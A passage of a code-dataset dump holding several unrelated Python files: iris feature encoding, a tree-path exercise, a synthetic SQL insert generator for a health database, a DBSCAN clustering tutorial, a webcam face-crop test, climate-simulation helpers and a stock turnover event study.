np.abs(noshifts)\n p = width - s\n\n # Shift\n if noshifts == 0:\n templatenew = template\n\n elif noshifts < 0:\n x = np.arange(p)\n templatenew[:, x] = template[:, s + x]\n x = np.arange(p, width)\n templatenew[:, x] = template[:, x - p]\n\n else:\n x = np.arange(s, width)\n templatenew[:, x] = template[:, x - s]\n x = np.arange(s)\n templatenew[:, x] = template[:, p + x]\n\n return templatenew\n\n\ndef getHmdistMat(features):\n num_feature = features.shape[0]\n hm_dists = np.zeros((num_feature, num_feature))\n pairs = [x for x in combinations([y for y in range(num_feature)], 2)]\n for x, y in tqdm(pairs, ncols=75, ascii=True):\n hm_dists[x, y] = calHammingDist(features[x, :, :], features[y, :, :])\n\n hm_dists = hm_dists + hm_dists.T\n\n return hm_dists\n\n\ndef getfeaturs(img_names, mask, size=(70, 1080)):\n features = np.zeros((len(img_names), size[0], size[1]), dtype=np.bool)\n for idx in tqdm(range(len(img_names)), ncols=75, ascii=True):\n img = cv.imread(os.path.join(DATA_PATH, 'NormIm', img_names[idx]), 0)\n features[idx, :, :], _ = encode(img, mask, minWaveLength, mult,\n sigmaOnf)\n return features\n\n\n# --------------------------------------------------------------------------\n# Execution\n# --------------------------------------------------------------------------\nif __name__ == \"__main__\":\n print(DATA_PATH)\n # Check the existence of temp_dir\n ft_path = os.path.join(TEMP_DIR, DATA_PATH.split('/')[-1] + '_shift.pkl')\n\n # read protocol\n start = time()\n img_names = []\n labels = []\n with open(os.path.join(DATA_PATH, 'test.txt'), 'r') as f:\n for line in f.readlines():\n tmp = line.strip().split(' ')\n img_names.append(tmp[0])\n labels.append(tmp[1])\n if LESS_FLAG:\n img_names = img_names[:15]\n labels = labels[:15]\n onehot = LabelBinarizer().fit_transform(labels)\n\n end = time()\n print('\\n>>> Loading time: {} [s]\\n'.format(end - start))\n start = end\n\n # encoding\n mask = np.zeros((70, 540)).astype(np.bool)\n features = getfeaturs(img_names, mask, (70, 1080))\n\n end = time()\n print('\\n>>> Encoding time: {} [s]\\n'.format(end - start))\n start = end\n\n # mask = np.zeros((70, 1080)).astype(np.bool)\n hm_dists = getHmdistMat(features)\n\n end = time()\n print('\\n>>> calHammingDist time: {} [s]\\n'.format(end - start))\n\n ft_load = {\n 'onehot': onehot,\n 'features': features.reshape(len(img_names), -1),\n 'labels': labels,\n 'hm_dists': hm_dists\n }\n if not LESS_FLAG:\n with open(ft_path, 'wb') as f:\n pickle.dump(ft_load, f)\n","sub_path":"python/extraction.py","file_name":"extraction.py","file_ext":"py","file_size_in_byte":4162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"626015033","text":"\ndef print_all_k_sum_path_util(root, value, path=[]):\n if not root:\n return\n path.append(root.value)\n node_sum = 0\n for i in range(len(path)-1, -1, -1):\n node_sum += path[i]\n if node_sum == value:\n for j in range(i, len(path)):\n print(path[j], end = ' ')\n print('')\n\n left = print_all_k_sum_path_util(root.left, value, path)\n\n right = print_all_k_sum_path_util(root.right, value, path)\n path.pop()\n\n\n\n\ndef print_all_k_sum_path(root, value):\n print_all_k_sum_path_util(root, value)\n\nclass newNode:\n def __init__(self, data):\n # put in the data\n self.value = data\n self.left = self.right = None\n\nroot = newNode(1)\nroot.left = newNode(3)\nroot.left.left = newNode(2)\nroot.left.right = newNode(1)\nroot.left.right.left = newNode(1)\nroot.right = newNode(-1)\nroot.right.left = newNode(4)\nroot.right.left.left = newNode(1)\nroot.right.left.right = newNode(2)\nroot.right.right = newNode(5)\nroot.right.right.right = newNode(2)\n\nprint_all_k_sum_path(root, 5)\n","sub_path":"Python_Projects/6-Google codejam/038_print_all_k_sum_paths.py","file_name":"038_print_all_k_sum_paths.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"230230789","text":"'''\r\nCreated on 27 de ago de 2016\r\n\r\n@author: Max\r\n'''\r\nfrom random import random, seed\r\n\r\ndef atividades_profissionais_gen():\r\n seed(0)\r\n inputFile = open(\"cbo\", \"r\")\r\n cbo = 0\r\n for linha in inputFile:\r\n cbo += 1\r\n prof = linha[8:-1]\r\n tp_cbo_saude = 'NULL'\r\n sql_inserts.write(\r\n\"\"\"\\\r\nINSERT INTO ATIVIDADES_PROFISSIONAIS VALUES ('{0}', '{1}', {2});\r\n\"\"\"\r\n .format(cbo, prof, tp_cbo_saude))\r\n print(\"atividades_profissionais done\")\r\n \r\nestados = []\r\ndef estados_gen():\r\n seed(0)\r\n inputFile = open(\"estados\", \"r\")\r\n \r\n for linha in inputFile:\r\n uf = linha[-3:-1]\r\n estados.append(uf)\r\n estado = linha[:-4]\r\n sql_inserts.write(\r\n\"\"\"\\\r\nINSERT INTO ESTADOS VALUES ('{0}', '{1}');\r\n\"\"\"\r\n .format(uf, estado))\r\n print(\"estados done\")\r\n\r\ndef estabelecimentos_gen():\r\n seed(0)\r\n for i in range(1, 1001):\r\n unidade_id = i\r\n cnes = 10000 + i \r\n latitude = 90 * random()\r\n longitude = 90 * random()\r\n cod_mun = int( 1000 * random() + 1)\r\n logradouro = \"Rua \" + str( i + 5000 )\r\n numero = 500 + int( random() * 1000 )\r\n complemento = \"NULL\" if random() < 0.07 else \"'{0}'\".format(int( random()*300 ))\r\n bairro = \"Bairro no.\" + str(i)\r\n cep = 90000000 + i*int((random()*10000))\r\n telefone = 5505130000000 + i*int((random()*10000))\r\n fax = 5505150000000 + i*int((random()*10000))\r\n email = \"hospital_\" + str(i) + \"@generico.com\"\r\n statusmov = \"NULL\"\r\n sql_inserts.write(\r\n\"\"\"\\\r\nINSERT INTO ESTABELECIMENTOS\r\nVALUES ('{0}', '{1}', {2}, {3}, '{4}', '{5}', '{6}', {7}, '{8}', '{9}', '{10}', '{11}', '{12}', {13});\r\n\"\"\"\r\n .format(unidade_id, cnes, latitude, longitude, cod_mun, logradouro, numero, complemento, bairro, cep, telefone, fax, email, statusmov))\r\n print(\"estabelecimentos done\")\r\n\r\ndef municipios_gen():\r\n seed(0)\r\n for i in range(1, 1001):\r\n uf = estados[i % len(estados)]\r\n nome_mun = \"Cidade no.\" + str(i)\r\n sql_inserts.write(\r\n\"\"\"\\\r\nINSERT INTO MUNICIPIOS VALUES ('{0}', '{1}', '{2}');\r\n\"\"\"\r\n .format(i, uf, nome_mun))\r\n print(\"municipios done\")\r\n \r\ndef end_compl_estab_gen():\r\n seed(0)\r\n for end_compl_id in range(1, 301):\r\n i = int(1000 * random() + 1)\r\n unidade_id = i\r\n cod_mun = int( 1000 * random() )\r\n logradouro = \"Rua \" + str( i + 5000 )\r\n numero = 500 + int( random() * 1000 )\r\n complemento = \"\" if int( random()*1000 )%13 == 0 else int( random()*300 ) \r\n bairro = \"Bairro no.\" + str(i)\r\n cep = 90000000 + int((random()*9999999))\r\n ddd_tel = int(random() * 999)\r\n telefone = 5505130000000 + int((random()*9999999))\r\n ddd_fax = int(random() * 999)\r\n fax = 5505150000000 + int((random()*9999999))\r\n email = \"complemento_\" + str(i) + \"@generico.com\"\r\n sql_inserts.write(\r\n\"\"\"\\\r\nINSERT INTO END_COMPL_ESTAB\r\nVALUES ('{0}', '{1}', '{2}', '{3}', '{4}', '{5}', '{6}', '{7}', '{8}', '{9}', '{10}', '{11}', '{12}');\r\n\"\"\"\r\n .format(end_compl_id, cod_mun, logradouro, numero, complemento, bairro, cep, ddd_tel, telefone, ddd_fax, fax, email, unidade_id))\r\n print(\"end_compl_estab done\")\r\n \r\ndef estab_horario_atend_gen():\r\n seed(0)\r\n estab_horario_atend_id = 0\r\n for unidade_id in range(1, 1001):\r\n for co_dia_semana in range(1, 8):\r\n estab_horario_atend_id += 1\r\n hr_inicio = str(int(12 * random())) + \":00\"\r\n hr_fim = str(int(12 + 12 * random())) + \":00\"\r\n sql_inserts.write(\r\n\"\"\"\\\r\nINSERT INTO ESTAB_HORARIOS_ATEND VALUES ('{0}', '{1}', '{2}', '{3}', '{4}');\r\n\"\"\"\r\n .format(estab_horario_atend_id, unidade_id, co_dia_semana, hr_inicio, hr_fim))\r\n print(\"estab_horario_atend_gen done\")\r\n \r\ndef tipos_de_atendimento_gen():\r\n seed(0)\r\n for co_atend_prestado in range(0, 100):\r\n descricao = \"Descricao \" + str(co_atend_prestado)\r\n categoria = 'c' if random() < 0.33 else ('e' if random() < 0.66 else 'p')\r\n sql_inserts.write(\r\n\"\"\"\\\r\nINSERT INTO TIPOS_DE_ATENDIMENTO VALUES ('{0}', '{1}', '{2}');\r\n\"\"\"\r\n .format(co_atend_prestado, descricao, categoria) )\r\n print(\"tipos_de_atendimento_gen done\")\r\n\r\n \r\ndef tipos_atend_estab_gen():\r\n seed(0)\r\n id_tipos_atend_estab = 0\r\n for unidade_id in range(1, 1001):\r\n for co_atend_prestado in range(0, 100):\r\n if random() < 0.039:\r\n id_tipos_atend_estab += 1\r\n sql_inserts.write(\r\n\"\"\"\\\r\nINSERT INTO TIPOS_ATEND_ESTAB VALUES ({0}, '{1}', '{2}');\r\n\"\"\"\r\n .format(id_tipos_atend_estab, unidade_id, co_atend_prestado))\r\n print(\"tipos_atend_estab_gen done\")\r\n \r\ndef usuarios_gen():\r\n seed(0)\r\n for id_usuario in range(1, 1001):\r\n telefone = 5505130000000 + int((random()*9999999))\r\n dd = int(random() * 27.99 + 1)\r\n mm = int(random() * 11.99 + 1)\r\n rr = int(random() * 16)\r\n hh24 = int(random() * 23.99)\r\n mi = int(random() * 59)\r\n ss = int(random() * 59)\r\n ts_cadastro = \"TO_DATE ('{0}-{1}-{2} {3}:{4}:{5}', 'DD-MM-RR HH24:MI:SS')\".format(dd, mm, rr, hh24, mi, ss)\r\n sql_inserts.write(\r\n\"\"\"\\\r\nINSERT INTO USUARIOS VALUES ({0}, {1}, {2});\r\n\"\"\"\r\n .format(id_usuario, telefone, ts_cadastro))\r\n print(\"usuarios_gen done\")\r\n \r\ndef pacientes_gen():\r\n seed(0)\r\n for id_paciente in range(1, 700):\r\n sql_inserts.write(\r\n\"\"\"\\\r\nINSERT INTO PACIENTES VALUES ({0});\r\n\"\"\"\r\n .format(id_paciente))\r\n print(\"pacientes_gen done\")\r\n \r\ndef profissionais_gen():\r\n seed(0)\r\n for id_usuario in range(600, 1001):\r\n prof_id = str(10000 + id_usuario)\r\n cpf_prof = int(89999999999 * random()) + 10000000000\r\n nome_prof = \"Profissional \" + prof_id\r\n dd = int(random() * 27.99 + 1)\r\n mm = int(random() * 11.99 + 1)\r\n yyyy = 1915 + int(random() * 100) \r\n data_nasc = \"TO_DATE ('{0}-{1}-{2}', 'DD-MM-YYYY')\".format(dd, mm, yyyy)\r\n sexo = \"m\" if random() < 0.5 else \"f\"\r\n statusmov = \"NULL\"\r\n no_email = \"profissional_\" + str(prof_id) + \"@generico.com\"\r\n sql_inserts.write(\r\n\"\"\"\\\r\nINSERT INTO PROFISSIONAIS VALUES ({0}, '{1}', '{2}', '{3}', {4}, '{5}', '{6}', '{7}'); \r\n\"\"\"\r\n .format(id_usuario, prof_id, cpf_prof, nome_prof, data_nasc, sexo, statusmov, no_email))\r\n print(\"profissionais_gen done\")\r\n \r\ndef medicos_gen():\r\n seed(0)\r\n for id_medico in range(650, 901):\r\n sql_inserts.write(\r\n\"\"\"\\\r\nINSERT INTO MEDICOS VALUES ({0}); \r\n\"\"\"\r\n .format(id_medico))\r\n print(\"medicos_gen done\")\r\n \r\ndef enderecos_gen():\r\n seed(0)\r\n id_enderecos = 0\r\n for id_paciente in range(1, 700):\r\n id_enderecos += 1\r\n dd = int(random() * 27.99 + 1)\r\n mm = int(random() * 11.99 + 1)\r\n rr = int(random() * 16)\r\n hh24 = int(random() * 23.99)\r\n mi = int(random() * 59)\r\n ss = int(random() * 59)\r\n ts_cadastro = \"TO_DATE ('{0}-{1}-{2} {3}:{4}:{5}', 'DD-MM-RR HH24:MI:SS')\".format(dd, mm, rr, hh24, mi, ss)\r\n logradouro = \"Rua \" + str( id_paciente + 5000 )\r\n numero = 500 + int( random() * 1000 )\r\n complemento = \"NULL\" if random() < 0.07 else \"'{0}'\".format(int( random()*300 ))\r\n bairro = \"Bairro no.\" + str(id_paciente)\r\n cod_cep = 90000000 + int((random()*9999999))\r\n \r\n sql_inserts.write(\r\n\"\"\"\\\r\nINSERT INTO ENDERECOS\r\nVALUES ({0}, {1}, {2}, '{3}', '{4}', {5}, '{6}', '{7}');\r\n\"\"\" \r\n .format(id_enderecos, id_paciente, ts_cadastro, logradouro, numero, complemento, bairro, cod_cep))\r\n \r\n if(random() < 0.66):\r\n id_enderecos += 1\r\n dd = int(random() * 27.99 + 1)\r\n mm = int(random() * 11.99 + 1)\r\n rr = int(random() * 16)\r\n hh24 = int(random() * 23.99)\r\n mi = int(random() * 59)\r\n ss = int(random() * 59)\r\n ts_cadastro = \"TO_DATE ('{0}-{1}-{2} {3}:{4}:{5}', 'DD-MM-RR HH24:MI:SS')\".format(dd, mm, rr, hh24, mi, ss)\r\n logradouro = \"Rua \" + str( id_paciente + 5000 )\r\n numero = 500 + int( random() * 1000 )\r\n complemento = \"NULL\" if random() < 0.07 else \"'{0}'\".format(int( random()*300 ))\r\n bairro = \"Bairro no.\" + str(id_paciente)\r\n cod_cep = 90000000 + int((random()*9999999))\r\n \r\n sql_inserts.write(\r\n\"\"\"\\\r\nINSERT INTO ENDERECOS\r\nVALUES ({0}, {1}, {2}, '{3}', '{4}', {5}, '{6}', '{7}');\r\n\"\"\" \r\n .format(id_enderecos, id_paciente, ts_cadastro, logradouro, numero, complemento, bairro, cod_cep))\r\n print(\"enderecos_gen done\")\r\n \r\ndef atendimentos_gen():\r\n for id_atendimento in range(1, 2001):\r\n co_atend_prestado = int(99.99*random())\r\n id_medico = 650 + int(random()*250.99)\r\n dd = int(random() * 27.99 + 1)\r\n mm = int(random() * 11.99 + 1)\r\n rr = int(random() * 1.99) + 15\r\n hh24 = int(random() * 12)\r\n mi = int(random() * 59)\r\n ss = int(random() * 59)\r\n ts_inicio = \"TO_DATE ('{0}-{1}-{2} {3}:{4}:{5}', 'DD-MM-RR HH24:MI:SS')\".format(dd, mm, rr, hh24, mi, ss)\r\n \r\n hh24 = int(random() * 12 + 10)\r\n mi = int(random() * 59)\r\n ss = int(random() * 59)\r\n ts_fim = \"TO_DATE ('{0}-{1}-{2} {3}:{4}:{5}', 'DD-MM-RR HH24:MI:SS')\".format(dd, mm, rr, hh24, mi, ss)\r\n\r\n descricao = \"Descricao de atendimento no.\" + str(id_atendimento) \r\n id_paciente = int(random()*698.99 + 1)\r\n while id_paciente == id_medico:\r\n \tid_paciente = int(random()*698.99 + 1)\r\n unidade_id = int(random()*999.99 + 1)\r\n sql_inserts.write(\r\n\"\"\"\\\r\nINSERT INTO ATENDIMENTOS\r\nVALUES ({0}, '{1}', {2}, {3}, {4}, '{5}', {6}, '{7}');\r\n\"\"\" \r\n .format(id_atendimento, co_atend_prestado, id_medico, ts_inicio, ts_fim, descricao, id_paciente, unidade_id))\r\n print(\"atendimentos_gen done\")\r\n \r\ndef prof_estab_gen():\r\n\tseed(0)\r\n\tfor id_prof_estab in range(1, 1001):\r\n\t\tunidade_id = 1 + int(999*random())\r\n\t\tid_usuario = 600 + int(random()*400.99)\r\n\t\tcod_cbo = int(999.99*random()) + 1\r\n\t\tsql_inserts.write(\r\n\"\"\"\\\r\nINSERT INTO PROF_ESTAB VALUES ({0}, '{1}', {2}, '{3}');\r\n\"\"\"\r\n\t\t.format(id_prof_estab, unidade_id, id_usuario, cod_cbo))\r\n\tprint(\"prof_estab_gen done\")\r\n\r\n#sql_inserts = open(\"sql_inserts\", \"w\")\r\n\r\nfuncoes = [ estados_gen, municipios_gen, estabelecimentos_gen, estab_horario_atend_gen,\r\nend_compl_estab_gen, atividades_profissionais_gen, tipos_de_atendimento_gen,\r\ntipos_atend_estab_gen, usuarios_gen, pacientes_gen, profissionais_gen,\r\nmedicos_gen, enderecos_gen, atendimentos_gen, prof_estab_gen]\r\n\r\nfor i, func in enumerate(funcoes):\r\n\tprint(\"insert{:02d}.sql\".format(i))\r\n\tsql_inserts = open(\"insert{:02d}.sql\".format(i), \"w\")\r\n\tfunc()\r\n\tsql_inserts.close()\r\n\r\n#print(funcoes)\r\n#sql_inserts.close()\r\nprint(\"all done!\")","sub_path":"sqlgen/sqlscripts/SQLInserts.py","file_name":"SQLInserts.py","file_ext":"py","file_size_in_byte":11013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"142216915","text":"# 밀도기반 군집 기법\n# 계층적 군집 분석은 비슷한 군집끼리 묶여가며 최종적으로는 하나의 큰 군집이 될 때까지 그룹핑하는 군집 기법임.\n# 반면, 밀도기반 군집은 점이 세밀하게 몰려있어 밀도가 높은 부분을 군집으로 묶는 기법\n# kmeans와는 달리 군집의 수를 지정x\n# 원 / 달 모양처럼 불특정한 형태의 데이터도 군집 가능\n# 또한, 군집을 시행하면서 노이즈데이터도 분류 가능.\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport math\n\nfrom matplotlib import cm\nfrom sklearn.cluster import KMeans, DBSCAN\nfrom sklearn.datasets import make_blobs, make_moons, make_circles\nfrom sklearn.metrics import silhouette_score, confusion_matrix, silhouette_samples, accuracy_score\n\nfrom sklearn import datasets\nfrom sklearn.model_selection import train_test_split\n\nfrom scipy.cluster.hierarchy import linkage\nfrom scipy.cluster.hierarchy import dendrogram\nfrom scipy.cluster.hierarchy import fcluster\nimport mglearn\n\n\n# dbscan 작동원리\n# eps : 대상 포인트를 기준으로 군집으로 포함시킬 영역크기\n# 즉, 어느 점을 기준으로 반경 x내에 점이 y개 존재한다면, 이 모두를 하나의 군집으로 인식\n\n# core point :\n# border point :\n# noise point :\nfrom sklearn.preprocessing import StandardScaler\n\nmglearn.plots.plot_dbscan()\nplt.show()\n\n# wholesale 데이터로 dbscan 분석 시도\n# 도매유통업체 440명의 고객 연간구매 데이터\n# 채널, 지역, 채소류, 우유, 식료품, 냉동, 세제, 제과류\n\nwsales = pd.read_csv('c:/Java/data/wholesale.csv')\nwsales.drop(['Channel', 'Region'], axis = 1, inplace=True) #채널, 지역 열 삭제\nprint(wsales.head())\n\n#식료품, 우유 연간 지출 분석\nX = wsales[['Grocery', 'Milk']]\nplt.scatter(X['Grocery'],X['Milk'])\nplt.show()\n\n# 단위가 너무 크므로 적절한 크기(평균 0, 분산1)로 정규화 실시\nX = X.as_matrix().astype('float32', copy = False)\nscaler = StandardScaler().fit(X)\nX = scaler.transform(X)\n\nplt.scatter(X[:, 0], X[:, 1])\nplt.xlabel('Grocery')\nplt.ylabel('Milk')\nplt.show()\n\n# 식료품 구매시 우유도 함께 구매하는 양의 상관관계 보임\n\n# DBScan을 이용한 군집 시도\ndbscan = DBSCAN(eps=1.0, min_samples=15)\n# min_samples : 군집시도 최소 점의 개수\n# eps : 군집에 포함시킬 원의 반경.\n\ndbscan.fit(X)\nlabels =dbscan.labels_ # 군집여부 출력\ncore_sample =np.zeros_like(labels, dtype=bool) #440x2 행렬을 만듦\ncore_sample[dbscan.core_sample_indices_] = True\nprint(labels)\nprint(core_sample) # 군집여부를 True/False로 출력\n\n# 군집 결과 시각화\nunique_labels = np.unique(labels) #0, -1\ncolors = plt.cm.Spectral(np.linspace(0, 1, len(unique_labels)))\n\nfor (label, color) in zip(unique_labels, colors):\n class_member_mask = (labels == label)\n # 군집여부에 대한 실제 값을 조사하기 위해 전체 데이터에 대해 true/false 값을 조사\n # 1. (labels == label) => labels == 0 : xy\n # 2. (labels == label) => labels == -1 : xy2\n # 정상적으로 군집으로 포함된 점들 출력\n xy = X[class_member_mask & core_sample]\n plt.plot(xy[:,0], xy[:, 1], 'o', markerfacecolor=color, markersize=10)\n # 군집으로 포함되지 못한 점들 출력\n xy2 = X[class_member_mask & ~core_sample]\n plt.plot(xy2[:,0], xy2[:,1],'o', markerfacecolor=color, markersize=5)\n plt.ylabel('Grocery')\n plt.xlabel('Milk')\n plt.show()\n\n# 세제, 제과류 커럼에 대한 군집화\n#식료품, 우유 연간 지출 분석\nX = wsales[['Detergents_Paper', 'Delicassen']]\nplt.scatter(X['Detergents_Paper'],X['Delicassen'])\nplt.show()\n\n# 단위가 너무 크므로 적절한 크기(평균 0, 분산1)로 정규화 실시\nX = X.as_matrix().astype('float32', copy = False)\nprint(X)\nscaler = StandardScaler().fit(X)\nX = scaler.transform(X)\nplt.scatter(X[:, 0], X[:, 1])\nplt.xlabel('Detergents_Paper')\nplt.ylabel('Delicassen')\nplt.show()\n#세제 구매시 제과류를 구매하는 상관관계는 거의 없음.\n\n# DBScan을 이용한 군집 시도\ndbscan = DBSCAN(eps=1.0, min_samples=5, metric='euclidean')\ny_pred = dbscan.fit_predict(X)\n# min_samples : 군집시도 최소 점의 개수\n# eps : 군집에 포함시킬 원의 반경.\n\ndbscan.fit(X)\nlabels =dbscan.labels_ # 군집여부 출력\ncore_sample =np.zeros_like(labels, dtype=bool) #440x2 행렬을 만듦\ncore_sample[dbscan.core_sample_indices_] = True\nprint(labels)\nprint(core_sample) # 군집여부를 True/False로 출력\n\nfor (label, color) in zip(unique_labels, colors):\n class_member_mask = (labels == label)\n # 군집여부에 대한 실제 값을 조사하기 위해 전체 데이터에 대해 true/false 값을 조사\n # 1. (labels == label) => labels == 0 : xy\n # 2. (labels == label) => labels == -1 : xy2\n # 정상적으로 군집으로 포함된 점들 출력\n xy = X[class_member_mask & core_sample]\n plt.plot(xy[:,0], xy[:, 1], 'o', markerfacecolor=color, markersize=10)\n # 군집으로 포함되지 못한 점들 출력\n xy2 = X[class_member_mask & ~core_sample]\n plt.plot(xy2[:,0], xy2[:,1],'o', markerfacecolor=color, markersize=5)\n plt.ylabel('Detergents_Paper')\n plt.xlabel('Delicassen')\n plt.show()","sub_path":"py1901/ML07d.py","file_name":"ML07d.py","file_ext":"py","file_size_in_byte":5291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"366297935","text":"from fipu_face.fipu_face import *\n\n\n# Test the cropping in real time using the camera\n\ndef draw_predict_info(frame, msg):\n info = {'Message': str(msg)}\n\n # text_list = [k + ': '+ v for k,v in zip(info.keys(), info.values())]\n text_list = [v for k, v in zip(info.keys(), info.values())]\n\n height, width = frame.shape[:2]\n fontScale = width / 1000\n\n for i, line in enumerate(text_list):\n cv2.putText(frame, line, (10, (i + 1) * int(30 * fontScale)),\n cv2.FONT_HERSHEY_SIMPLEX, fontScale, COLOR_RED, 2)\n\n\ndef detect_on_img(frame):\n try:\n frame = detect(frame)\n\n return frame\n except ImageException as e:\n # print(e.get_error_codes())\n if e.image is not None:\n frame = e.image\n draw_predict_info(frame, e.get_error_codes())\n return frame\n\n\ndef detect_camera():\n cap = cv2.VideoCapture(0)\n while True:\n ret, frame = cap.read()\n if not ret:\n print(\"no frame\")\n break\n\n frame = detect_on_img(frame)\n cv2.imshow('frame', frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n cap.release()\n cv2.destroyAllWindows()\n\n\nif __name__ == '__main__':\n detect_camera()\n","sub_path":"tests/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"273823858","text":"from oas_erf.constants import path_data_info\nfrom pathlib import Path\nimport pandas as pd\nimport numpy as np\nimport xarray as xr\n\n\ndef get_casen_by_type_mod(case_type, model_type):\n if case_type == 'PD':\n ct = 'PIaerPD'\n else:\n ct = case_type\n sims = pd.read_csv(Path(path_data_info) / 'simulation_types.csv', index_col=0)\n case = sims.loc[ct, model_type]\n return case\n\n\ndef get_diff_by_type(cases_dic,\n varl,\n case_types=None,\n mod_types=None,\n ctrl='ctrl',\n relative=False):\n \"\"\"\n Calculates difference between cases case relevant ctrl.\n Example: If\n ctrl='PI'\n case_types=['PI', 'PD'],\n mod_types=['OsloAeroSec', 'OsloAero$_{def}$']\n then the output will be the difference between the PD and PI runs for OsloAeroSec and\n OsloAero_def respectively, outputting dic[model_type] dic.\n :param cases_dic: dictionary with case names as keys and xr.Datasets as elements\n :param varl:\n :param case_types:\n :param mod_types:\n :param ctrl:\n :param relative:\n :return:\n \"\"\"\n sims = pd.read_csv(Path(path_data_info) / 'simulation_types.csv', index_col=0)\n if case_types is None:\n case_types = ['incYield', 'decYield']\n if mod_types is None:\n mod_types = ['OsloAeroSec', 'OsloAero$_{imp}$', 'OsloAero$_{def}$']\n di = {}\n print(case_types, mod_types)\n for case_type in case_types:\n ctlab = f'{case_type}-{ctrl}'\n if relative:\n ctlab = f'({case_type}-{ctrl})/{ctrl}'\n di[ctlab] = {}\n for mod_type in mod_types:\n case = sims.loc[case_type, mod_type]\n case_ctrl = sims.loc[ctrl, mod_type]\n # _df = df2[var]\n if relative:\n di[ctlab][mod_type] = 100. * (cases_dic[case][varl] - cases_dic[case_ctrl][varl]) / np.abs(\n cases_dic[case_ctrl][varl])\n if isinstance(di[ctlab][mod_type], xr.Dataset):\n for var in varl:\n di[ctlab][mod_type][var].attrs['units'] = '%'\n else:\n print(f'subtracting {case}-{case_ctrl}')\n di[ctlab][mod_type] = cases_dic[case][varl] - cases_dic[case_ctrl][varl]\n\n return di\n\n\ndef get_abs_by_type(cases_dic,\n case_types=None,\n mod_types=None):\n \"\"\"\n From dict(case_name:xr.Dataset,...) to dict(case_type:{mod_type:xr.Dataset})\n :param cases_dic: dict\n :param case_types: list\n :param mod_types: list\n :return: dict\n \"\"\"\n\n sims = pd.read_csv(Path(path_data_info) / 'simulation_types.csv', index_col=0)\n if case_types is None:\n case_types = ['incYield', 'decYield']\n if mod_types is None:\n mod_types = ['OsloAeroSec', 'OsloAero$_{imp}$', 'OsloAero$_{def}$']\n di = {}\n print(case_types, mod_types)\n for case_type in case_types:\n # ctlab = f'{case_type}-{ctrl}'\n di[case_type] = {}\n for mod_type in mod_types:\n case = sims.loc[case_type, mod_type]\n di[case_type][mod_type] = cases_dic[case]\n return di\n\n\ndef transpose_2lev_dic(dic_abs, ctrl='ctrl'):\n dic_absT = {}\n _case_t = list(dic_abs.keys())\n _mod_t = list(dic_abs[_case_t[0]].keys())\n if ctrl is None:\n l = _case_t\n else:\n l = _case_t + [ctrl]\n for mo in _mod_t:\n dic_absT[mo] = {}\n for type in l:\n dic_absT[mo][type] = dic_abs[type][mo]\n return dic_absT\n","sub_path":"oas_erf/data_info/simulation_types.py","file_name":"simulation_types.py","file_ext":"py","file_size_in_byte":3533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"310852053","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jun 24 11:07:39 2018\n\n@author: aoieht\n\"\"\"\n\n\nimport pandas as pd\nimport numpy as np\nfrom numpy.linalg import inv\nfrom datetime import timedelta\n\n#导入事件样本\nevent_path = '../raw_data/event_sample.xlsx'\nevent_sample = pd.read_excel(event_path)\nevent_sample = event_sample.set_index(event_sample['股票代码'].map(str)+'@'+event_sample['会计年度'])\n\n#导入个股日换手率数据\nturnover_data_path = '../raw_data/historical_daily_turnover_rate_all_stock/daily_turnover_rate.xlsx'\ndaily_turnover = pd.read_excel(turnover_data_path).set_index('日期_Date')\n\n#导入市场日换手率数据\nmkt_turnover_path = '../raw_data/historical_daily_turnover_rate_all_stock/Market_TurnoverRate.xlsx'\nmkt_turnover = pd.read_excel(mkt_turnover_path).set_index('日期')\n\ntmp_columns = []\nfor i in range(-10, 11): #事件窗口列标签\n tmp_columns.append('t_'+str(i))\nab_tr = pd.DataFrame(data=None, index=event_sample.index, columns=tmp_columns)\n\nfor e in range(len(event_sample)):\n try:\n tmp_stock = event_sample.iloc[e]['股票代码']\n tmp_event_date = pd.to_datetime(event_sample.iloc[e]['预计披露日期'])\n if tmp_event_date.isoweekday() == 6: #公告日为周末的调整为交易日\n tmp_event_date = (tmp_event_date + timedelta(days=2)).strftime('%Y-%m-%d')\n elif tmp_event_date.isoweekday() == 7:\n tmp_event_date = (tmp_event_date + timedelta(days=1)).strftime('%Y-%m-%d')\n else:\n tmp_event_date = (tmp_event_date).strftime('%Y-%m-%d')\n \n tmp_tr_series = daily_turnover.loc[:,tmp_stock].dropna() #当前股票的日换手率序列\n tmp_loc = tmp_tr_series.index.get_loc(tmp_event_date)\n \n #非事件窗口: [t_0 - 135, t_0 - 11]与[t_0 + 11, t_0 + 135]之并\n nonevent_window_tr = tmp_tr_series.iloc[np.r_[tmp_loc-135:tmp_loc-10,tmp_loc+11:tmp_loc+136]]\n nonevent_window_mkttr = mkt_turnover.loc[nonevent_window_tr.index]\n \n #事件窗口: [t_0 - 10, t_0 + 10]\n event_window_tr = tmp_tr_series.iloc[tmp_loc-10:tmp_loc+11]\n event_window_mkttr = mkt_turnover.loc[event_window_tr.index]\n \n tmp_abtr = (event_window_tr.values - np.transpose(event_window_mkttr.values)) - np.nanmean(nonevent_window_tr.values - np.transpose(nonevent_window_mkttr.values)) #事件窗口日度abnormal turnover rate\n ab_tr.iloc[e] = tmp_abtr\n except:\n continue\n \ncatr = np.sum(ab_tr.loc[:,['t_-5','t_-4','t_-3','t_-2','t_-1']], axis=1).to_frame(name='CATR_[-5,-1]').replace(to_replace=0,value=np.nan) #事件日前5交易���的累计abnormal turnover rate记CATR\nexceldata = 